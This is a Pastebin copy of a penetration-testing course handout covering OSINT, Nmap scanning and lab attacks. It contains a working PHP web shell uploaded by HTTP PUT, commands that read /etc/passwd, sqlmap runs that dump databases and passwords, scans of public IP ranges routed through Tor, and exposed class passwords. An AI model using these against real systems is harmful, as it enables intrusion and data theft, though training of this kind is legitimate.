daily pastebin goal
66%
SHARE
TWEET

Untitled

djtroby May 31st, 2017 75 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ########################################################
  2. # CyberWar: Advanced Offensive Cyber Operations        #
  3. # By Joe McCray of Strategic Security                  #
  4. ########################################################
  5.  
  6.  
  7.  
  8. #########################
  9. # Class Virtual Machine #
  10. #########################
  11.  
  12.  
  13. Here is the VMWare virtual machine for the class:
  14.  
  15. https://infosecaddictsfiles.blob.core.windows.net/vms/InfoSecAddictsVM.zip
  16. user:      infosecaddicts
  17. pass:      infosecaddicts
  18.  
  19.  
  20.  
  21.  
  22.  
  23. ################
  24. # Day 1: OSINT #
  25. ################
  26. OK - it's time to get rollin!!!!!! I know that you are probably ready to scan the entire planet but I want you to do some Open Source Intelligence (OSINT) first.
  27.  
  28. Here is an an OSINT report that I did for a customer of mine a few years ago:
  29. https://infosecaddictsfiles.blob.core.windows.net/files/OSINT_Innophos_11242010.doc
  30.  
  31. Let's see if you can do a better one than me....
  32.  
  33.  
  34. Here are a few places to start:
  35.  
  36. - Wikipedia Page
  37.     - Are they Public or Private?
  38.     - Does the target have any subsidiaries?
  39.     - Who are the key people
  40.  
  41. - Robtex
  42.     - Show system map
  43.     - Are they behind a CDN
  44.  
  45. - Netcraft
  46.     - http://toolbar.netcraft.com/site_report
  47.     - Are they using a Loadbalancer like F5 BigIP, or Citrix NetScaler
  48.  
  49. - Passive Recon (Firefox Add-on)
  50.   Download it from: https://addons.mozilla.org/en-US/firefox/addon/passiverecon/
  51.  
  52.  
  53.  
  54.  
  55. Your first task:
  56. ----------------
  57. Use the OSINT_Innophos doc as a reference and perform/document an OSINT assessment against any one of the following companies:
  58. NSA
  59. HSBC
  60. Coke
  61. Exxon Mobil
  62. KPMG
  63. Accenture
  64. NewYork-Presbyterian Hospital
  65. Kroger
  66. Dillard's
  67. Royal Caribbean International
  68.  
  69.  
  70.  
  71. Tools that are good for OSINT:
  72. ------------------------------
  73. Here are some tools that I think you should consider using for this challenge:
  74. FOCA
  75. Maltego
  76. Search Diggity
  77. ShodanHQ
  78. PassiveRecon
  79. EDGAR
  80. theHarvester
  81. gxfr.py
  82. VisualRoute
  83.  
  84.  
  85.  
  86.  
  87.  
  88. ********************************** Begin Day 1 Homework Part 1 **********************************
  89. NOTE: Creating this OSINT Report IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
  90.  
  91.  
  92. You must create a MS WORD document titled 'FirstName-LastName-Cyberwar-Day1-OSINT-Report.docx' (ex: Joseph-McCray-CyberWar-Day1-OSINT-Report.docx).
  93.  
  94. You must spell you name EXACTLY as you want it spelled on your class certificate.
  95.  
  96. IMPORTANT NOTE:
  97. Your homework must be submitted via email to both (joe@strategicsec.com) by Sunday May 21st at midnight EST.
  98.  
  99.  
  100. ********************************** End Day 1 Homework Part 1 **********************************
  101.  
  102.  
  103.  
  104.  
  105. Email Harvesting
  106. ----------------
  107.  
  108. cd ~/toolz/
  109.  
  110. rm -rf theharvester-read-only/
  111.  
  112. sudo apt install -y python-pyasn1 python-pyasn1-modules
  113.      infosecaddicts
  114.  
  115. git clone https://github.com/laramies/theHarvester.git
  116.  
  117. cd theHarvester/
  118.  
  119. python theHarvester.py
  120.  
  121. python theHarvester.py -d motorola.com -l 50 -b google
  122.  
  123. python theHarvester.py -d motorola.com -l 50 -b bing
  124.  
  125. python theHarvester.py -d motorola.com -l 50 -b linkedin
  126.  
  127. python theHarvester.py -d motorola.com -l 50 -b pgp
  128.  
  129.  
  130.  
  131.  
  132.  
  133. File Meta-Data Harvesting
  134. -------------------------
  135. cd ~/toolz/
  136.  
  137. sudo apt install -y python-pip
  138.      infosecaddicts
  139.  
  140. sudo pip install google
  141.      infosecaddicts
  142.  
  143. git clone https://github.com/opsdisk/metagoofil.git
  144.  
  145. cd metagoofil/
  146.  
  147.  
  148. python metagoofil.py -d motorola.com -t doc,pdf -l 100 -n 3 -o motorolafiles
  149.  
  150. sudo apt install -y libimage-exiftool-perl
  151.  
  152. exiftool -r *.doc | egrep -i "Author|Creator|Email|Producer|Template" | sort -u
  153.  
  154.  
  155.  
  156.  
  157.  
  158. python metagoofil.py -d [domain name] -t doc,pdf -l 100 -n 3 -o motorolafiles
  159. Whereas:
  160.  
  161. -d : I used another domain name aside from Google.com to make it work
  162. -t : I asked for the program to search two types of public documents whuch are doc and pdf files
  163. -l : I limited the search result to 100 to make the process faster
  164. -n : I limited the downloads (files that are going to be downloaded to get their metadatas extracted) to only 3 to make the process faster
  165. -o : I directed the result of the compilation t motorolafiles, which is a file located inside the metagoofil directory (~/toolz/metagoofil/motorolafiles)
  166. -f : Save the html links to html_links_<TIMESTAMP>.txt file
  167.  
  168.  
  169.  
  170.  
  171.  
  172.  
  173. Github Info Harvesting
  174. ----------------------
  175. cd ~/toolz/
  176.  
  177. sudo pip install gitem
  178.     infosecaddicts
  179.  
  180. gitem organization facebook
  181.  
  182.  
  183. gitem repository facebook react
  184.  
  185.  
  186. gitem --processes 4 user zpao
  187.      ** This should give you a rate limit error. You need to create an OAuth token like my example below
  188.  
  189. gitem -o xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx --processes 4 user zpao
  190.  
  191.  
  192. Github Access Token Creation Reference:
  193. https://help.github.com/articles/creating-an-access-token-for-command-line-use/
  194.  
  195.  
  196. Network Topology Enumeration (NOTE: This tool may not work anymore due to changes at BING)
  197. ------------------------------------------------------------------------------------------
  198.  
  199. cd ~/toolz/
  200.  
  201. wget https://raw.githubusercontent.com/leonteale/pentestpackage/master/gxfr.py
  202.  
  203. python gxfr.py --bxfr --dns-lookup -o
  204.     motorola.com
  205.     [ press enter ]
  206.     cw1kxyUgMdkECBNMb1fGqKJ9sC1lznaR20fPJeIt45Y=
  207.  
  208. ------------------------------------------------------------------------------------------
  209.  
  210.  
  211. cd ~/toolz/
  212.  
  213. rm -rf fierce2/
  214.  
  215. git clone https://github.com/mschwager/fierce.git
  216.  
  217. cd fierce
  218.  
  219. sudo apt install -y python3-pip
  220.     infosecaddicts
  221.  
  222. sudo pip3 install -r requirements.txt
  223.  
  224. python3 fierce.py -h
  225.  
  226. python3 fierce.py --domain motorola.com --subdomains accounts admin ads
  227. Traverse IPs near discovered domains to search for contiguous blocks with the --traverse flag:
  228.  
  229. python3 fierce.py --domain facebook.com --subdomains accounts --traverse 10
  230.  
  231.  
  232. Limit nearby IP traversal to certain domains with the --search flag:
  233.  
  234. python3 fierce.py --domain facebook.com --subdomains admin --search fb.com fb.net
  235.  
  236.  
  237. Attempt an HTTP connection on domains discovered with the --connect flag:
  238.  
  239. python3 fierce.py --domain stackoverflow.com --subdomains mail --connect
  240.  
  241.  
  242.  
  243.  
  244.  
  245.  
  246. Recon-NG (Metasploit for Recon):
  247. --------------------------------
  248. cd ~/toolz/
  249.  
  250. sudo apt install -y git python-pip python-dnspython python-mechanize python-slowaes python-xlsxwriter python-jsonrpclib python-lxml
  251.     infosecaddicts
  252.  
  253. sudo pip install dicttoxml
  254.     infosecaddicts
  255.  
  256.  
  257.  
  258. git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git
  259. cd recon-ng
  260. ./recon-ng
  261.  
  262.  
  263.  
  264. At the prompt, let's type help in order to look at the commands we can use in Recon-ng.
  265.  
  266. recon-ng > help
  267.  
  268.  
  269. Note that many of these commands are nearly identical to Metasploit including back, set, use, search, show, and unset.
  270.  
  271. recon-ng > [ TAB ] [ TAB ]
  272.  
  273.  
  274.  
  275. To see all the modules in Recon-ng, we can type:
  276.  
  277. recon-ng > show [ TAB ] [ TAB ]
  278.  
  279.  
  280.  
  281. Ok, let's drive this thing....
  282.  
  283. recon-ng > show banner
  284.  
  285. recon-ng > show companies
  286.  
  287. recon-ng > show contacts
  288.  
  289. recon-ng > show credentials
  290.  
  291. recon-ng > show dashboard
  292.  
  293. recon-ng > show domains
  294.  
  295. recon-ng > show hosts
  296.  
  297. recon-ng > show keys
  298.  
  299. recon-ng > show leaks
  300.  
  301. recon-ng > show locations
  302.  
  303. recon-ng > show modules
  304.  
  305. recon-ng > show netblocks
  306.  
  307. recon-ng > show options
  308.  
  309. recon-ng > show ports
  310.  
  311. recon-ng > show profiles
  312.  
  313. recon-ng > show pushpins
  314.  
  315. recon-ng > show repositories
  316.  
  317. recon-ng > show schema
  318.  
  319. recon-ng > show vulnerabilities
  320.  
  321. recon-ng > show workspaces
  322.  
  323.  
  324.  
  325.  
  326.  
  327. When you have found a module that you would like to try the process is fairly straight forward.
  328.  
  329. Type, “use [Modulename]” to use the module
  330.  
  331. Type, “show info” to view information about the module
  332.  
  333. And then, “show options” to see what variables can be set
  334.  
  335. Set the option variables with “set [variable]”
  336.  
  337. Finally, type “run” to execute the module
  338.  
  339.  
  340.  
  341.  
  342.  
  343.  
  344. ********************************** Begin Day 1 Homework Part 2 **********************************
  345. NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
  346.  
  347.  
  348. You must take screenshots of the process of you registering at least 5 API keys, as well as screenshots of you using at least 10 Recon-NG modules against a target company.
  349.  
  350.  
  351. You must create a MS WORD document titled 'FirstName-LastName-Pentester-CyberWar-Day1-Recon-NG.docx' (ex: Joseph-McCray-Cyberwar-Day1-Recon-NG.docx).
  352.  
  353. You must spell you name EXACTLY as you want it spelled on your class certificate.
  354.  
  355.  
  356. Reference links:
  357. http://null-byte.wonderhowto.com/how-to/hack-like-pro-reconnaissance-with-recon-ng-part-1-getting-started-0169854/
  358. http://resources.infosecinstitute.com/basic-updated-guide-to-recon-ng-plus-new-modules-rundown/
  359.  
  360. IMPORTANT NOTE:
  361. Your homework must be submitted via email to both (joe@strategicsec.com and gayane@strategicsec.com) by Sunday May 21st at midnight EST.
  362.  
  363. ********************************** End Day 1 Homework Part 2 **********************************
  364.  
  365.  
  366.  
  367.  
  368.  
  369.  
  370.  
  371.  
  372.  
  373. ############################
  374. # Day 2: Advanced Scanning #
  375. ############################
  376. Today will be heavily focused on scanning. We're going to scan, then scan again, and then scan some more. When we are doing scanning - we are going to scan some more....
  377.  
  378.  
  379.  
  380.  
  381. ########################
  382. # Scanning Methodology #
  383. ########################
  384.  
  385. - Ping Sweep
  386. What's alive?
  387. ------------
  388. sudo nmap -sP 157.166.226.*
  389.      infosecaddicts
  390.  
  391.     -if -SP yields no results try:
  392.  
  393. sudo nmap -sL 157.166.226.*
  394.      infosecaddicts
  395.  
  396. sudo nmap -sL 157.166.226.* | grep com
  397.      infosecaddicts
  398.  
  399. - Port Scan
  400. What's where?
  401. ------------
  402. sudo nmap -sS 162.243.126.247
  403.      infosecaddicts
  404.  
  405.  
  406. - Bannergrab/Version Query
  407. What versions of software are running
  408. -------------------------------------
  409. sudo nmap -sV 162.243.126.247
  410.      infosecaddicts
  411.  
  412.  
  413. - Vulnerability Research
  414. Lookup the banner versions for public exploits
  415. ----------------------------------------------
  416. http://exploit-db.com
  417. http://securityfocus.com/bid
  418. https://packetstormsecurity.com/files/tags/exploit/
  419.  
  420. Example lookup for this scan would be:
  421. https://web.nvd.nist.gov/view/vuln/search-results?query=nginx&search_type=all&cves=on
  422.  
  423.  
  424.  
  425.  
  426.  
  427. NOTE:
  428. Gereon, gave us a nice tip today about using IPTables ConnTrack:
  429. iptables -I INPUT -m state -p icmp --echo-type echo-reply -j ACCEPT --state RELATED
  430.  
  431. His point was that if you only accept echo-reply by related/state related all of the bogus answers will be dropped as the TTL decrement will be out of whack.
  432.  
  433. You can see this point with another tool. I'll get you the syntax later today.
  434.  
  435.  
  436.  
  437. #######################################################
  438. # Day 2: 3rd Party Scanning, and scanning via proxies #
  439. #######################################################
  440.  
  441. https://www.shodan.io/
  442.  
  443.     Create a FREE account and login
  444.  
  445.     net:129.188.8.0/24
  446.  
  447.  
  448.  
  449.  
  450.  
  451. Scanning via Tor/proxychains
  452. ----------------------------
  453. sudo apt install -y tor proxychains ntpdate
  454.  
  455. sudo vi /etc/proxychains.conf               <--- Make sure that last line of the file is: Socks4  127.0.0.1 9050
  456.  
  457. sudo ntpdate pool.ntp.org
  458.     infosecaddicts
  459.  
  460. tor-resolve room362.com
  461.  
  462. proxychains nmap -sT -p80 162.243.126.247
  463.  
  464. proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,445,1433,1521,3306,3389,8080,10000 162.243.126.247
  465.  
  466.  
  467.  
  468.  
  469.  
  470.  
  471.  
  472. ------------------------------------------------------
  473. cd ~/toolz
  474. git clone https://github.com/sensepost/glypeahead.git
  475. cd glypeahead/
  476. vi config.php
  477.  
  478. ****make the following change****
  479. 'proxies'       =>      array(
  480.                 'https://branon.co.uk/glype/desktop-free/index.php',        <--- line 40
  481.                 'http://ricardoalcala.com/index.php',
  482.         )
  483.  
  484.  
  485. php glypeahead config.php
  486.  
  487.  
  488.  
  489.  
  490. #########################
  491. # Playing with Nmap NSE #
  492. #########################
  493.  
  494. nmap -Pn -p80 --script ip-geolocation-* infosecaddicts.com
  495.  
  496. nmap -p80 --script dns-brute infosecaddicts.com
  497.  
  498. nmap --script http-robtex-reverse-ip secore.info
  499.  
  500. nmap -Pn -p80 --script=http-headers infosecaddicts.com
  501.  
  502.  
  503. ls /usr/share/nmap/scripts | grep http
  504. nmap -Pn -p80 --script=http-* infosecaddicts.com
  505.  
  506.  
  507.  
  508.  
  509.  
  510.  
  511.  
  512.  
  513.  
  514.  
  515.  
  516.  
  517.  
  518.  
  519. ###################################
  520. # Day 2: Scanning the lab network #
  521. ###################################
  522.  
  523. -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
  524. Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
  525. If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
  526.  
  527. So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
  528. https://infosecaddictsfiles.blob.core.windows.net/files/Strategic-Security-2017-VPN-Info.pdf
  529. vpn username: {first_initial.last_name}  example: j.mccray
  530. vpn password: vpnVPN1234!@#$
  531.  
  532.  
  533. sudo nmap -sP 10.0.0.0/24
  534.      infosecaddicts
  535.  
  536.  
  537. sudo nmap -sL 10.0.0.0/24
  538.      infosecaddicts
  539.  
  540. cd ~/toolz
  541.  
  542. wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c
  543.  
  544. gcc ipcrawl.c -o ipcrawl
  545.  
  546. chmod 777 ipcrawl
  547.  
  548. ./ipcrawl 10.0.0.1 10.0.0.254
  549.  
  550.  
  551.  
  552. wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
  553.  
  554. gcc propecia.c -o propecia
  555.  
  556. sudo cp propecia /bin
  557.      infosecaddicts
  558.  
  559. propecia 10.0.0 22
  560.  
  561. propecia 10.0.0 3389
  562.  
  563. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | grep open
  564.  
  565. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2 " " $3}'
  566.  
  567. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' | wc -l
  568.  
  569. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}'
  570.  
  571. nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 10.0.0.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt
  572.  
  573. cat ~/labnet-ip-list.txt
  574.  
  575. #################################################
  576. # Screenshotting the Web Servers in the Network #
  577. #################################################
  578. cd ~/toolz/
  579. mkdir labscreenshots
  580. cd labscreenshots/
  581.  
  582.  
  583. wget http://download.gna.org/wkhtmltopdf/0.12/0.12.4/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  584. tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
  585. cd wkhtmltox/bin/
  586. sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386
  587.  
  588.  
  589. cd ~/toolz/
  590. git clone git://github.com/SpiderLabs/Nmap-Tools.git
  591. cd Nmap-Tools/NSE/
  592.  
  593. sudo cp http-screenshot.nse /usr/share/nmap/scripts/
  594.      infosecaddicts
  595.  
  596. sudo nmap --script-updatedb
  597.      infosecaddicts
  598.  
  599.  
  600. cd ~/toolz/labscreenshots/
  601. sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 10.0.0.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt
  602.      infosecaddicts
  603.  
  604.  
  605.  
  606.  
  607. vi screenshots.sh
  608.  
  609. #!/bin/bash
  610. printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html
  611. ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html
  612. printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
  613.  
  614.  
  615.  
  616.  
  617.  
  618. sh screenshots.sh
  619.  
  620.  
  621. python -m SimpleHTTPServer
  622.  
  623.  
  624. --- Now browse to the IP of your Linux machine on port 8000 (http://192.168.200.157:8000/labnet-port-80-screenshots.html):
  625. http://Ubuntu-VM-IP:8000/labnet-port-80-screenshots.html
  626.  
  627.  
  628.  
  629.  
  630. ##########################
  631. # Nmap NSE tricks to try #
  632. ##########################
  633. sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 10.0.0.0/24
  634.      infosecaddicts
  635.  
  636. sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 10.0.0.0/24
  637.      infosecaddicts
  638.  
  639. sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 10.0.0.0/24
  640.      infosecaddicts
  641.  
  642. sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 10.0.0.0/24
  643.      infosecaddicts
  644.  
  645. sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 10.0.0.0/24
  646.      infosecaddicts
  647.  
  648. sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 10.0.0.0/24
  649.      infosecaddicts
  650.  
  651. sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 10.0.0.0/24
  652.      infosecaddicts
  653.  
  654. sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 10.0.0.0/24
  655.      infosecaddicts
  656.  
  657. sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 10.0.0.0/24
  658.      infosecaddicts
  659.  
  660. sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 10.0.0.0/24
  661.      infosecaddicts
  662.  
  663. sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 10.0.0.0/24
  664.      infosecaddicts
  665.  
  666. sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 10.0.0.0/24
  667.      infosecaddicts
  668.  
  669.  
  670. sudo nmap -sV -oA nse --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" 10.0.0.0/24
  671.      infosecaddicts
  672.  
  673.  
  674. #####################################
  675. # Writing Your Own Nmap NSE Scripts #
  676. #####################################
  677.  
  678.  
  679. ----------------------------------------------------------------------
  680. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  681.  
  682. -- The Head Section --
  683. -- The Rule Section --
  684. portrule = function(host, port)
  685.     return port.protocol == "tcp"
  686.             and port.number == 80
  687.             and port.state == "open"
  688. end
  689.  
  690. -- The Action Section --
  691. action = function(host, port)
  692.     return "CyberWar!"
  693. end
  694. ----------------------------------------------------------------------
  695.  
  696. - Ok, now that we've made that change let's run the script
  697. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  698.  
  699.  
  700.  
  701.  
  702.  
  703.  
  704. ----------------------------------------------------------------------
  705. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  706.  
  707. -- The Head Section --
  708. local shortport = require "shortport"
  709.  
  710. -- The Rule Section --
  711. portrule = shortport.http
  712.  
  713.  
  714. -- The Action Section --
  715. action = function(host, port)
  716.     return "CyberWar!"
  717. end
  718. ----------------------------------------------------------------------
  719.  
  720. - Ok, now that we've made that change let's run the script
  721. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443
  722.  
  723.  
  724.  
  725.  
  726.  
  727.  
  728.  
  729. OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
  730.  
  731. ----------------------------------------------------------------------
  732. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  733.  
  734. -- The Head Section --
  735. local shortport = require "shortport"
  736. local http = require "http"
  737.  
  738. -- The Rule Section --
  739. portrule = shortport.http
  740.  
  741. -- The Action Section --
  742. action = function(host, port)
  743.  
  744.     local uri = "/installing-metasploit-in-ubunt/"
  745.     local response = http.get(host, port, uri)
  746.     return response.status
  747.  
  748. end
  749. ----------------------------------------------------------------------
  750.  
  751. - Ok, now that we've made that change let's run the script
  752. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  753.  
  754.  
  755.  
  756.  
  757. ----------------------------------------------------------------------
  758. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  759.  
  760. -- The Head Section --
  761. local shortport = require "shortport"
  762. local http = require "http"
  763.  
  764. -- The Rule Section --
  765. portrule = shortport.http
  766.  
  767. -- The Action Section --
  768. action = function(host, port)
  769.  
  770.     local uri = "/installing-metasploit-in-ubunt/"
  771.     local response = http.get(host, port, uri)
  772.  
  773.     if ( response.status == 200 ) then
  774.         return response.body
  775.     end
  776.  
  777. end
  778. ----------------------------------------------------------------------
  779.  
  780. - Ok, now that we've made that change let's run the script
  781. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  782.  
  783.  
  784.  
  785.  
  786.  
  787.  
  788.  
  789.  
  790.  
  791. ----------------------------------------------------------------------
  792. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  793.  
  794. -- The Head Section --
  795. local shortport = require "shortport"
  796. local http = require "http"
  797. local string = require "string"
  798.  
  799. -- The Rule Section --
  800. portrule = shortport.http
  801.  
  802. -- The Action Section --
  803. action = function(host, port)
  804.  
  805.     local uri = "/installing-metasploit-in-ubunt/"
  806.     local response = http.get(host, port, uri)
  807.  
  808.     if ( response.status == 200 ) then
  809.         local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  810.         return title
  811.     end
  812.  
  813. end
  814. ----------------------------------------------------------------------
  815.  
  816. - Ok, now that we've made that change let's run the script
  817. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  818.  
  819.  
  820.  
  821.  
  822.  
  823.  
  824.  
  825. ----------------------------------------------------------------------
  826. sudo vi /usr/share/nmap/scripts/intro-nse.nse
  827.  
  828. -- The Head Section --
  829. local shortport = require "shortport"
  830. local http = require "http"
  831. local string = require "string"
  832.  
  833. -- The Rule Section --
  834. portrule = shortport.http
  835.  
  836. -- The Action Section --
  837. action = function(host, port)
  838.  
  839.     local uri = "/installing-metasploit-in-ubunt/"
  840.     local response = http.get(host, port, uri)
  841.  
  842.     if ( response.status == 200 ) then
  843.         local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
  844.  
  845.         if (title) then
  846.             return "Vulnerable"
  847.         else
  848.             return "Not Vulnerable"
  849.         end
  850.     end
  851. end
  852.  
  853. ----------------------------------------------------------------------
  854.  
  855. - Ok, now that we've made that change let's run the script
  856. sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
  857.  
  858.  
  859.  
  860. ********************************** Begin Day 2 Homework Part 1 **********************************
  861. NOTE: THIS IS AN ABSOLUTE REQUIREMENT FOR YOUR CPE CREDITS
  862.  
  863. You must take screenshots of you performing all of the scanning tasks that we have done so far today
  864.  
  865. You must create a MS WORD document titled 'FirstName-LastName-Pentester-CyberWar-Day2-Adv-Scanning.docx' (ex: Joseph-McCray-CyberWar-Day2-Adv-Scanning.docx).
  866.  
  867. You must spell you name EXACTLY as you want it spelled on your class certificate.
  868.  
  869. IMPORTANT NOTE:
  870. Your homework must be submitted via email to both (joe@strategicsec.com) by Sunday May 21st at midnight EST.
  871.  
  872. ********************************** End Day 2 Homework Part 1 **********************************
  873.  
  874.  
  875.  
  876.  
  877.  
  878.  
  879. ##########
  880. # Day 3: #
  881. ##########
  882. Today I gave the students access to a folder in my Google Drive that allowed the students to share data and they also joined https://chat.strategicsec.com/channel/cyberwar so they can communicate with each other.
  883.  
  884. The goal for today is for the class to attack 10.0.0.14 together and see what they can learn.
  885.  
  886.  
  887.  
  888. #######################
  889. # Attacking 10.0.0.14 #
  890. #######################
  891.  
  892. Step 1: Nmap Scan
  893.  
  894. sudo nmap -sV -Pn 10.0.0.14
  895.  
  896.  
  897.  
  898. Step 2: Nikto Scan
  899.  
  900. cd ~/toolz
  901. rm -rf nikto/
  902. sudo apt install -y nikto
  903. nikto -h 10.0.0.14
  904.  
  905.  
  906. Step 3: Directory Bruteforce
  907. https://sourceforge.net/projects/dirbuster/
  908.  
  909.  
  910.  
  911. Step 4: Enumerate Server options (confirm nikto results)
  912.  
  913. curl -vX OPTIONS 10.0.0.14/test
  914. mkdir webshellz
  915. cd webshellz/
  916. vi cmd.php
  917.  
  918. ---------------------------------------------
  919. <HTML><BODY>
  920. <FORM METHOD="GET" NAME="myform" ACTION="">
  921. <INPUT TYPE="text" NAME="cmd">
  922. <INPUT TYPE="submit" VALUE="Send">
  923. </FORM>
  924. <pre>
  925. <?
  926. if($_GET['cmd']) {
  927.   system($_GET['cmd']);
  928.   }
  929. ?>
  930. </pre>
  931. </BODY></HTML>
  932. ---------------------------------------------
  933.  
  934.  
  935.  
  936. curl -vX PUT -d "$(cat cmd.php)" 10.0.0.14/test/cmd.php
  937.  
  938.  
  939.  
  940.  
  941. Now use your web browser to browse to page:
  942. http://10.0.0.14/test/cmd.php
  943.  
  944.  
  945. Enter the following commands:
  946. /sbin/ifconfig
  947. pwd
  948. id
  949. uname -a
  950. cat /etc/passwd
  951.  
  952.  
  953.  
  954. Figure out how to root this box!!!!!!!!!!!!!!!!
  955.  
  956.  
  957.  
  958. ######################
  959. # Attacking 10.0.0.5 #
  960. ######################
  961.  
  962. Step 1: Nmap Scan
  963.  
  964. sudo nmap -sV -Pn 10.0.0.5
  965.  
  966.  
  967.  
  968. Step 2: Nikto Scan
  969.  
  970. cd ~/toolz
  971.  
  972. perl nikto.pl -h 10.0.0.5
  973.  
  974. cd /home/infosecaddicts/toolz/sqlmap-dev
  975.  
  976. python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 -s ./scan_report_pgsql.txt -t ./scan_trace_pgsql.txt --skip-urlencode
  977.  
  978.  
  979. Security Issue 1: Directory Browsing
  980. ------------------------------------
  981. http://10.0.0.5/bin/
  982.  
  983. Browse to this URL in your web browser.
  984.  
  985.  
  986. You may want to go for a hail mary and decompile the DLL files with something like JetPack: https://www.jetbrains.com/decompiler/ but don't get your hopes up.
  987.  
  988.  
  989. Attacking 10.0.0.5 with SQLMap
  990. ------------------------------
  991. cd /home/infosecaddicts/toolz/sqlmap-dev
  992. python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode
  993.  
  994. cd /home/infosecaddicts/.sqlmap/output/10.0.0.5
  995. ls
  996.  
  997. cd ~/toolz/sqlmap-dev/
  998. python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs
  999.  
  1000. python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs --current-user
  1001.  
  1002. python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs --current-user --passwords
  1003.  
  1004. python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs --current-user --current-db --tables
  1005.  
  1006. python sqlmap.py -u http://10.0.0.5/Vulnerable.ashx --data='{"username":"*","method":"list"}' -v1 --os=Linux --level=5 --risk=3 --skip-urlencode --dbs --current-user --current-db --tables --dump
  1007.  
  1008.  
  1009.  
  1010. ################################
  1011. # Attacking Big Data Solutions #
  1012. ################################
  1013.  
  1014. propecia 10.0.0 27017
  1015.  
  1016.  
